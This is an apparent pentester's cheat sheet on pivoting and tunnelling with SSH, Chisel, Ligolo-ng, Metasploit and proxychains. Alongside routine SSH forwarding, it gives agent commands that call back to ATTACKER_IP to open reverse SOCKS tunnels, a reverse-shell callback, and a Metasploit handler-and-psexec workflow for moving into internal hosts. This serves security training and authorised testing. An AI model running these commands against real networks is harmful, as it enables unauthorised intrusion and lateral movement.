pivoting-and-tunnelling.md (20060B)
1 --- 2 title: "Pivoting and Tunnelling" 3 description: "Expose a remote service on your local machine." 4 category: tunneling-pivoting 5 tags: ["tunneling-pivoting", "sql-injection", "pivoting", "tunneling"] 6 tools: ["Nmap", "Metasploit", "Meterpreter", "Evil-WinRM", "Chisel"] 7 difficulty: intermediate 8 updated: "2026-08-10" 9 source: "vault:Misc/Pivoting and Tunnelling .md" 10 --- 11 # Pivoting & Port Forwarding Cheat Sheet 12 ## Practical Command Reference 13 14 --- 15 16 ## SSH Tunnelling 17 18 ### Local Port Forwarding (-L) 19 Expose a remote service on your local machine. 20 21 ```bash 22 # Syntax: ssh -L [local_addr:]local_port:dest_host:dest_port user@ssh_server 23 24 # Forward local port 8080 to internal web server 10.10.10.50:80 via jump host 25 ssh -L 8080:10.10.10.50:80 user@jump.example.com 26 27 # Bind only to localhost (more secure) 28 ssh -L 127.0.0.1:8080:10.10.10.50:80 user@jump.example.com 29 30 # Forward local 3306 to remote MySQL that only listens on localhost 31 ssh -L 3306:127.0.0.1:3306 user@dbserver.example.com 32 33 # Multiple forwards in one connection 34 ssh -L 8080:10.10.10.50:80 -L 3306:10.10.10.51:3306 user@jump.example.com 35 ``` 36 37 ### Remote Port Forwarding (-R) 38 Expose a local service to the remote network. 39 40 ```bash 41 # Syntax: ssh -R [remote_addr:]remote_port:dest_host:dest_port user@ssh_server 42 43 # Expose local port 80 on remote server's port 8080 44 ssh -R 8080:127.0.0.1:80 user@remote.example.com 45 46 # Expose local service to all interfaces on remote (requires GatewayPorts yes) 47 ssh -R 0.0.0.0:8080:127.0.0.1:80 user@remote.example.com 48 49 # Reverse shell callback - expose attacker's listener 50 ssh -R 4444:127.0.0.1:4444 user@compromised.example.com 51 ``` 52 53 ### Dynamic Port Forwarding (-D) - SOCKS Proxy 54 Create a SOCKS proxy to access the remote network. 55 56 ```bash 57 # Syntax: ssh -D [local_addr:]local_port user@ssh_server 58 59 # Create SOCKS5 proxy on port 1080 60 ssh -D 1080 user@jump.example.com 61 62 # Bind to localhost only 63 ssh -D 127.0.0.1:9050 user@jump.example.com 64 65 # Use with proxychains (edit /etc/proxychains4.conf first) 66 # Add: socks5 127.0.0.1 1080 67 proxychains4 nmap -sT -Pn 10.10.10.0/24 68 proxychains4 curl http://10.10.10.50 69 70 # Use with curl directly 71 curl --proxy socks5h://127.0.0.1:1080 http://10.10.10.50 72 73 # Use with Firefox: Settings > Network > SOCKS5 > 127.0.0.1:1080 74 ``` 75 76 ### Jump Hosts / ProxyJump (-J) 77 Chain through multiple hosts (OpenSSH 7.3+). 78 79 ```bash 80 # Syntax: ssh -J user@jump1,user@jump2 user@destination 81 82 # Single jump 83 ssh -J user@bastion.example.com user@internal.server 84 85 # Multiple jumps 86 ssh -J user@jump1:22,user@jump2:22 user@final-target 87 88 # With port forwarding through jump 89 ssh -J user@bastion -L 8080:10.10.10.50:80 user@internal 90 91 # In ~/.ssh/config 92 Host internal 93 HostName 10.10.10.50 94 User admin 95 ProxyJump user@bastion.example.com 96 ``` 97 98 ### Useful SSH Options 99 100 ```bash 101 # Background and don't execute remote command 102 ssh -fN -L 8080:10.10.10.50:80 user@jump 103 104 # Compression (helps on slow links) 105 ssh -C -D 1080 user@jump 106 107 # Keep connection alive 108 ssh -o ServerAliveInterval=60 -o ServerAliveCountMax=3 -D 1080 user@jump 109 110 # Disable strict host key checking (lab use only!) 111 ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null user@host 112 113 # Use specific key 114 ssh -i ~/.ssh/id_rsa_jump -D 1080 user@jump 115 116 # Verbose debugging 117 ssh -v -D 1080 user@jump # -vv or -vvv for more 118 ``` 119 120 ### ~/.ssh/config Example 121 122 ``` 123 Host bastion 124 HostName bastion.example.com 125 User jumpuser 126 IdentityFile ~/.ssh/bastion_key 127 DynamicForward 1080 128 LocalForward 8443 internal-web:443 129 ServerAliveInterval 60 130 131 Host internal-* 132 ProxyJump bastion 133 User admin 134 135 Host internal-db 136 HostName 10.10.10.51 137 LocalForward 3306 127.0.0.1:3306 138 ``` 139 140 --- 141 142 ## Chisel 143 144 ### Installation 145 146 ```bash 147 # Download latest release 148 curl https://i.jpillora.com/chisel! | bash 149 150 # Or from GitHub releases 151 wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz 152 gunzip chisel_1.9.1_linux_amd64.gz 153 chmod +x chisel_1.9.1_linux_amd64 154 mv chisel_1.9.1_linux_amd64 chisel 155 156 # Windows 157 certutil -urlcache -split -f https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz chisel.gz 158 ``` 159 160 ### Server Mode (Attacker Machine) 161 162 ```bash 163 # Basic server on port 8080 164 ./chisel server -p 8080 165 166 # With reverse tunnel support (required for R: prefixed remotes) 167 ./chisel server -p 8080 --reverse 168 169 # With SOCKS5 support 170 ./chisel server -p 8080 --socks5 171 172 # With both 173 ./chisel server -p 8080 --reverse --socks5 174 175 # With authentication 176 ./chisel server -p 8080 --reverse --auth user:password 177 178 # With TLS (auto Let's Encrypt) 179 ./chisel server -p 443 --reverse --tls-domain example.com 180 181 # With TLS (custom certs) 182 ./chisel server -p 8443 --reverse --tls-key server.key --tls-cert server.crt 183 184 # Generate and use persistent key 185 ./chisel server --keygen /tmp/chisel.key 186 ./chisel server -p 8080 --reverse --keyfile /tmp/chisel.key 187 ``` 188 189 ### Client Mode (Target/Pivot Machine) 190 191 ```bash 192 # Connect and forward local port 8080 to server's localhost:80 193 ./chisel client ATTACKER_IP:8080 8080:127.0.0.1:80 194 195 # Forward local 3000 to remote service at 10.10.10.50:3000 196 ./chisel client ATTACKER_IP:8080 3000:10.10.10.50:3000 197 198 # SOCKS proxy (server needs --socks5) 199 ./chisel client ATTACKER_IP:8080 socks 200 # Creates SOCKS5 on client localhost:1080 201 202 # Custom SOCKS port 203 ./chisel client ATTACKER_IP:8080 5000:socks 204 205 # REVERSE tunnel - open port on SERVER that forwards to target network 206 ./chisel client ATTACKER_IP:8080 R:8001:10.10.10.50:80 207 # Now attacker can access 10.10.10.50:80 via localhost:8001 208 209 # REVERSE SOCKS - SOCKS proxy on attacker, exits on target network 210 ./chisel client ATTACKER_IP:8080 R:socks 211 # SOCKS5 on attacker localhost:1080, traffic exits via target 212 213 # Reverse SOCKS on custom port 214 ./chisel client ATTACKER_IP:8080 R:1080:socks 215 216 # Multiple tunnels 217 ./chisel client ATTACKER_IP:8080 R:8001:10.10.10.50:80 R:8002:10.10.10.51:22 R:socks 218 219 # With authentication 220 ./chisel client --auth user:password ATTACKER_IP:8080 R:socks 221 222 # With fingerprint verification (get fingerprint from server output) 223 ./chisel client --fingerprint XXXXX ATTACKER_IP:8080 R:socks 224 225 # Through a proxy 226 ./chisel client --proxy http://proxy:3128 ATTACKER_IP:8080 R:socks 227 ./chisel client --proxy socks://proxy:1080 ATTACKER_IP:8080 R:socks 228 229 # Verbose output 230 ./chisel client -v ATTACKER_IP:8080 R:socks 231 ``` 232 233 ### Common Chisel Patterns 234 235 ```bash 236 # PATTERN 1: Reverse SOCKS (most common for pivoting) 237 # Attacker: 238 ./chisel server -p 8080 --reverse 239 # Target: 240 ./chisel client ATTACKER:8080 R:socks 241 # Use: proxychains nmap -sT -Pn 10.10.10.0/24 242 243 # PATTERN 2: Access internal web server 244 # Attacker: 245 ./chisel server -p 8080 --reverse 246 # Target: 247 ./chisel client ATTACKER:8080 R:8001:192.168.1.100:80 248 # Access: curl http://127.0.0.1:8001 249 250 # PATTERN 3: Forward SOCKS (client-side proxy) 251 # Attacker: 252 ./chisel server -p 8080 --socks5 253 # Target: 254 ./chisel client ATTACKER:8080 1080:socks 255 # Configure browser/tools on TARGET to use localhost:1080 256 257 # PATTERN 4: Expose target's SSH 258 # Attacker: 259 ./chisel server -p 8080 --reverse 260 # Target: 261 ./chisel client ATTACKER:8080 R:2222:127.0.0.1:22 262 # Attacker: ssh user@127.0.0.1 -p 2222 263 ``` 264 265 --- 266 267 ## Ligolo-ng 268 269 ### Installation 270 271 ```bash 272 # Download proxy (attacker) and agent (target) 273 # From: https://github.com/nicocha30/ligolo-ng/releases 274 275 # Attacker (Linux) 276 wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz 277 tar -xzf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz 278 279 # Agent (Linux target) 280 wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_linux_amd64.tar.gz 281 tar -xzf ligolo-ng_agent_0.6.2_linux_amd64.tar.gz 282 283 # Agent (Windows target) 284 # Download: ligolo-ng_agent_0.6.2_windows_amd64.zip 285 ``` 286 287 ### Proxy Setup (Attacker Machine) 288 289 ```bash 290 # Create TUN interface (required, needs root/sudo) 291 sudo ip tuntap add user $(whoami) mode tun ligolo 292 sudo ip link set ligolo up 293 294 # For multiple tunnels, create additional interfaces 295 sudo ip tuntap add user $(whoami) mode tun ligolo2 296 sudo ip link set ligolo2 up 297 298 # Start proxy with self-signed cert 299 ./proxy -selfcert 300 301 # Start proxy with Let's Encrypt (requires port 443) 302 ./proxy -autocert 303 304 # Custom port 305 ./proxy -selfcert -laddr 0.0.0.0:443 306 307 # With specific interface binding 308 ./proxy -selfcert -laddr 10.10.14.5:11601 309 ``` 310 311 ### Agent Setup (Target Machine) 312 313 ```bash 314 # Linux - connect to proxy 315 ./agent -connect ATTACKER_IP:11601 -ignore-cert 316 317 # Windows 318 agent.exe -connect ATTACKER_IP:11601 -ignore-cert 319 320 # Through SOCKS proxy 321 ./agent -connect ATTACKER_IP:11601 -ignore-cert --socks 127.0.0.1:1080 322 323 # With retry 324 ./agent -connect ATTACKER_IP:11601 -ignore-cert -retry 325 ``` 326 327 ### Proxy Commands (Interactive Console) 328 329 ```bash 330 # List connected agents 331 ligolo-ng » session 332 333 # Select an agent (by ID number) 334 ligolo-ng » session 335 ? Specify a session: 1 - user@target - 192.168.1.50:54321 336 337 # Show agent network interfaces 338 [Agent: user@target] » ifconfig 339 340 # Start the tunnel on default interface 341 [Agent: user@target] » start 342 343 # Start tunnel on specific interface (for multiple tunnels) 344 [Agent: user@target] » start --tun ligolo2 345 346 # Stop tunnel 347 [Agent: user@target] » stop 348 349 # Add listener (port forward from agent network) 350 [Agent: user@target] » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444 351 # Opens 1234 on agent, forwards to attacker's 4444 352 353 # List listeners 354 [Agent: user@target] » listener_list 355 356 # Remove listener 357 [Agent: user@target] » listener_del 0 358 ``` 359 360 ### Route Configuration (Attacker Machine) 361 362 ```bash 363 # Add route to target network through ligolo interface 364 sudo ip route add 10.10.10.0/24 dev ligolo 365 366 # Multiple networks 367 sudo ip route add 192.168.1.0/24 dev ligolo 368 sudo ip route add 172.16.0.0/16 dev ligolo 369 370 # For second tunnel (different agent), use ligolo2 371 sudo ip route add 10.20.30.0/24 dev ligolo2 372 373 # Verify routes 374 ip route | grep ligolo 375 376 # Remove route when done 377 sudo ip route del 10.10.10.0/24 dev ligolo 378 ``` 379 380 ### Complete Ligolo-ng Workflow 381 382 ```bash 383 # === ATTACKER SETUP === 384 # 1. Create interface 385 sudo ip tuntap add user $(whoami) mode tun ligolo 386 sudo ip link set ligolo up 387 388 # 2. Start proxy 389 ./proxy -selfcert -laddr 0.0.0.0:443 390 391 # === TARGET === 392 # 3. Run agent (transfer binary first) 393 ./agent -connect ATTACKER_IP:443 -ignore-cert 394 395 # === ATTACKER PROXY CONSOLE === 396 # 4. Select session 397 ligolo-ng » session 398 # Select the agent 399 400 # 5. Check target interfaces (note the internal subnet) 401 [Agent] » ifconfig 402 # e.g., see 10.10.10.0/24 on eth1 403 404 # 6. Start tunnel 405 [Agent] » start 406 407 # === ATTACKER SHELL === 408 # 7. Add route to internal network 409 sudo ip route add 10.10.10.0/24 dev ligolo 410 411 # 8. Now you can access internal network directly! 412 ping 10.10.10.1 413 nmap -sT -Pn 10.10.10.0/24 414 curl http://10.10.10.50 415 ssh user@10.10.10.51 416 417 # === REVERSE PORT FORWARD (for callbacks) === 418 # On proxy console: 419 [Agent] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 420 421 # Now internal hosts can connect to agent:4444, reaches attacker:4444 422 # Useful for reverse shells from double-pivoted networks 423 ``` 424 425 ### Double Pivot with Ligolo-ng 426 427 ```bash 428 # First pivot already established to 10.10.10.0/24 429 # Now pivot through 10.10.10.50 to reach 192.168.1.0/24 430 431 # === ATTACKER === 432 # Create second interface 433 sudo ip tuntap add user $(whoami) mode tun ligolo2 434 sudo ip link set ligolo2 up 435 436 # Create listener on first agent to relay second agent connection 437 [Agent: first] » listener_add --addr 0.0.0.0:11601 --to 127.0.0.1:11601 438 439 # === SECOND PIVOT HOST (10.10.10.50) === 440 # Run agent connecting through first pivot 441 ./agent -connect 10.10.10.FIRST_AGENT:11601 -ignore-cert 442 443 # === ATTACKER PROXY CONSOLE === 444 # Select new session 445 ligolo-ng » session 446 # Select second agent 447 448 # Start on second interface 449 [Agent: second] » start --tun ligolo2 450 451 # === ATTACKER === 452 # Add route for deep network 453 sudo ip route add 192.168.1.0/24 dev ligolo2 454 455 # Now reach 192.168.1.0/24 through double pivot! 456 nmap -sT -Pn 192.168.1.0/24 457 ``` 458 459 --- 460 461 ## Metasploit Framework Pivoting 462 463 ### Autoroute (Add Routes Through Session) 464 465 ```bash 466 # From Meterpreter session 467 meterpreter > run autoroute -s 10.10.10.0/24 468 469 # Or with netmask 470 meterpreter > run autoroute -s 10.10.10.0 -n 255.255.255.0 471 472 # Print routes 473 meterpreter > run autoroute -p 474 475 # Delete route 476 meterpreter > run autoroute -d -s 10.10.10.0 477 478 # Using post module (from msf console) 479 msf6 > use post/multi/manage/autoroute 480 msf6 post(autoroute) > set SESSION 1 481 msf6 post(autoroute) > set SUBNET 10.10.10.0 482 msf6 post(autoroute) > set NETMASK /24 483 msf6 post(autoroute) > run 484 485 # Manual route add from msf console 486 msf6 > route add 10.10.10.0/24 1 487 msf6 > route add 192.168.1.0 255.255.255.0 1 488 489 # View routes 490 msf6 > route print 491 492 # Remove route 493 msf6 > route remove 10.10.10.0/24 1 494 495 # Flush all routes 496 msf6 > route flush 497 ``` 498 499 ### SOCKS Proxy Module 500 501 ```bash 502 # Background your meterpreter session first 503 meterpreter > background 504 505 # Use SOCKS proxy module 506 msf6 > use auxiliary/server/socks_proxy 507 508 # Configure 509 msf6 auxiliary(socks_proxy) > set SRVHOST 127.0.0.1 510 msf6 auxiliary(socks_proxy) > set SRVPORT 1080 511 msf6 auxiliary(socks_proxy) > set VERSION 5 512 513 # Optional auth (SOCKS5 only) 514 msf6 auxiliary(socks_proxy) > set USERNAME proxyuser 515 msf6 auxiliary(socks_proxy) > set PASSWORD proxypass 516 517 # Run in background 518 msf6 auxiliary(socks_proxy) > run -j 519 520 # Verify it's running 521 msf6 > jobs 522 523 # Configure proxychains (/etc/proxychains4.conf) 524 # socks5 127.0.0.1 1080 525 526 # Use external tools through proxy 527 proxychains4 nmap -sT -Pn 10.10.10.0/24 528 proxychains4 curl http://10.10.10.50 529 proxychains4 ssh user@10.10.10.51 530 ``` 531 532 ### Port Forwarding (portfwd) 533 534 ```bash 535 # LOCAL FORWARD - access remote service locally 536 meterpreter > portfwd add -l 8080 -p 80 -r 10.10.10.50 537 # Now access 10.10.10.50:80 via localhost:8080 538 539 # Forward to target's localhost service 540 meterpreter > portfwd add -l 3306 -p 3306 -r 127.0.0.1 541 # Access target's MySQL on your localhost:3306 542 543 # REMOTE/REVERSE FORWARD - for callbacks from deep network 544 meterpreter > portfwd add -R -l 4444 -L 0.0.0.0 -p 9999 545 # Listens on target:9999, forwards to attacker:4444 546 547 # List port forwards 548 meterpreter > portfwd list 549 550 # Delete specific forward 551 meterpreter > portfwd delete -l 8080 -p 80 -r 10.10.10.50 552 553 # Delete by index 554 meterpreter > portfwd delete -i 0 555 556 # Flush all 557 meterpreter > portfwd flush 558 ``` 559 560 ### Complete Metasploit Pivoting Workflow 561 562 ```bash 563 # === Initial Access === 564 msf6 > use exploit/multi/handler 565 msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp 566 msf6 > set LHOST eth0 567 msf6 > set LPORT 4444 568 msf6 > run 569 570 # (get meterpreter session) 571 572 # === Enumerate Target Networks === 573 meterpreter > ipconfig 574 meterpreter > arp 575 meterpreter > route 576 577 # Discover dual-homed: 192.168.1.50 and 10.10.10.50 578 579 # === Add Route === 580 meterpreter > run autoroute -s 10.10.10.0/24 581 meterpreter > run autoroute -p 582 meterpreter > background 583 584 # === Start SOCKS Proxy === 585 msf6 > use auxiliary/server/socks_proxy 586 msf6 > set SRVPORT 1080 587 msf6 > run -j 588 589 # === Scan Internal Network === 590 # Option 1: Use Metasploit scanner modules (uses autoroute automatically) 591 msf6 > use auxiliary/scanner/portscan/tcp 592 msf6 > set RHOSTS 10.10.10.0/24 593 msf6 > set PORTS 22,80,443,445,3389 594 msf6 > run 595 596 # Option 2: Use external tools via SOCKS 597 proxychains4 nmap -sT -Pn -p22,80,443,445 10.10.10.0/24 598 599 # === Exploit Internal Target === 600 msf6 > use exploit/windows/smb/psexec 601 msf6 > set RHOSTS 10.10.10.100 602 msf6 > set SMBUSER admin 603 msf6 > set SMBPASS password123 604 msf6 > set PAYLOAD windows/x64/meterpreter/bind_tcp 605 msf6 > set RHOST 10.10.10.100 606 msf6 > run 607 608 # (traffic automatically routes through session 1) 609 610 # === Port Forward for Direct Access === 611 # Re-enter first session 612 msf6 > sessions -i 1 613 meterpreter > portfwd add -l 3389 -p 3389 -r 10.10.10.100 614 615 # Now RDP to internal host 616 xfreerdp /v:127.0.0.1 /u:admin /p:password123 617 ``` 618 619 ### Pivoting Through Multiple Networks 620 621 ```bash 622 # Session 1: Access to 10.10.10.0/24 623 meterpreter > run autoroute -s 10.10.10.0/24 624 meterpreter > background 625 626 # Exploit host in 10.10.10.0/24 that has access to 192.168.1.0/24 627 # Get Session 2 628 629 # Session 2: Access to 192.168.1.0/24 630 msf6 > sessions -i 2 631 meterpreter > run autoroute -s 192.168.1.0/24 632 meterpreter > background 633 634 # View all routes 635 msf6 > route print 636 637 # Traffic to 10.10.10.0/24 goes through Session 1 638 # Traffic to 192.168.1.0/24 goes through Session 2 (which itself routes through Session 1) 639 ``` 640 641 --- 642 643 ## Proxychains Configuration 644 645 ### /etc/proxychains4.conf 646 647 ```ini 648 # Dynamic chain - skip dead proxies 649 dynamic_chain 650 651 # Strict chain - all proxies must work 652 #strict_chain 653 654 # Random chain - random proxy order 655 #random_chain 656 657 # Quiet mode - less output 658 quiet_mode 659 660 # Proxy DNS through proxy (important!) 661 proxy_dns 662 663 # Timeouts 664 tcp_read_time_out 15000 665 tcp_connect_time_out 8000 666 667 [ProxyList] 668 # SOCKS5 proxy (Chisel, Metasploit) 669 socks5 127.0.0.1 1080 670 671 # SOCKS4 alternative 672 #socks4 127.0.0.1 1080 673 674 # Chain multiple proxies 675 #socks5 127.0.0.1 1080 676 #socks5 127.0.0.1 1081 677 ``` 678 679 ### Proxychains Usage 680 681 ```bash 682 # Basic usage 683 proxychains4 nmap -sT -Pn 10.10.10.0/24 684 proxychains4 curl http://10.10.10.50 685 proxychains4 ssh user@10.10.10.51 686 proxychains4 evil-winrm -i 10.10.10.50 -u admin -p password 687 688 # With specific config file 689 proxychains4 -f /tmp/myproxy.conf nmap -sT -Pn 10.10.10.50 690 691 # Quiet mode 692 proxychains4 -q curl http://10.10.10.50 693 694 # Note: Only TCP works through SOCKS 695 # Use -sT (TCP connect) not -sS (SYN scan) with nmap 696 # ICMP (ping) won't work through standard SOCKS 697 ``` 698 699 --- 700 701 ## Quick Reference Tables 702 703 ### Port Forwarding Syntax Comparison 704 705 | Tool | Local Forward | Remote Forward | SOCKS Proxy | 706 |------|--------------|----------------|-------------| 707 | **SSH** | `ssh -L 8080:target:80 user@jump` | `ssh -R 8080:localhost:80 user@jump` | `ssh -D 1080 user@jump` | 708 | **Chisel** | `chisel client srv:8080 8080:target:80` | `chisel client srv:8080 R:8080:target:80` | `chisel client srv:8080 R:socks` | 709 | **Meterpreter** | `portfwd add -l 8080 -p 80 -r target` | `portfwd add -R -l 80 -p 8080` | `use auxiliary/server/socks_proxy` | 710 | **Ligolo-ng** | N/A (use routes) | `listener_add --addr 0.0.0.0:P1 --to 127.0.0.1:P2` | N/A (full routing) | 711 712 ### Common Ports to Forward 713 714 | Service | Port | Example Forward | 715 |---------|------|-----------------| 716 | SSH | 22 | `-L 2222:target:22` | 717 | HTTP | 80 | `-L 8080:target:80` | 718 | HTTPS | 443 | `-L 8443:target:443` | 719 | SMB | 445 | `-L 4445:target:445` | 720 | RDP | 3389 | `-L 3389:target:3389` | 721 | WinRM | 5985/5986 | `-L 5985:target:5985` | 722 | MySQL | 3306 | `-L 3306:target:3306` | 723 | MSSQL | 1433 | `-L 1433:target:1433` | 724 | PostgreSQL | 5432 | `-L 5432:target:5432` | 725 726 ### Tool Selection Quick Guide 727 728 | Scenario | Recommended Tool | 729 |----------|-----------------| 730 | Have SSH access, need single port | SSH -L/-R | 731 | Have SSH access, need multiple destinations | SSH -D (SOCKS) | 732 | Need to deploy binary, HTTP egress only | Chisel | 733 | Need full L3 routing (ICMP, raw nmap) | Ligolo-ng | 734 | Already have Meterpreter session | Metasploit autoroute | 735 | Double/triple pivot | Ligolo-ng or Chisel chains | 736 | Stealth (use existing services) | SSH | 737 738 --- 739 740 ## Troubleshooting 741 742 ```bash 743 # SSH: Debug connection issues 744 ssh -vvv -D 1080 user@host 745 746 # SSH: Test if forwarding works 747 # Local: curl localhost:8080 after -L 8080:target:80 748 # Check server allows forwarding: grep -i tcpforwarding /etc/ssh/sshd_config 749 750 # Chisel: Verbose mode 751 ./chisel client -v ATTACKER:8080 R:socks 752 ./chisel server -v -p 8080 --reverse 753 754 # Ligolo-ng: Verify TUN interface 755 ip link show ligolo 756 ip route | grep ligolo 757 758 # Ligolo-ng: Check agent connectivity 759 # In proxy console: session (should list agents) 760 761 # Metasploit: Verify routes 762 msf6 > route print 763 msf6 > route get 10.10.10.50 764 765 # Proxychains: Test 766 proxychains4 curl -v http://10.10.10.50 767 768 # General: Check listening ports 769 ss -tlnp | grep 1080 770 netstat -tlnp | grep 1080 771 ``` 772 773 --- 774 775 ## Sources 776 777 | Tool | Documentation | 778 |------|---------------| 779 | OpenSSH | https://man.openbsd.org/ssh | 780 | Chisel | https://github.com/jpillora/chisel | 781 | Ligolo-ng | https://github.com/nicocha30/ligolo-ng | 782 | Ligolo-ng Docs | https://docs.ligolo.ng/ | 783 | Metasploit Pivoting | https://docs.metasploit.com/docs/using-metasploit/intermediate/pivoting-in-metasploit.html | 784 | Proxychains-ng | https://github.com/rofl0r/proxychains-ng |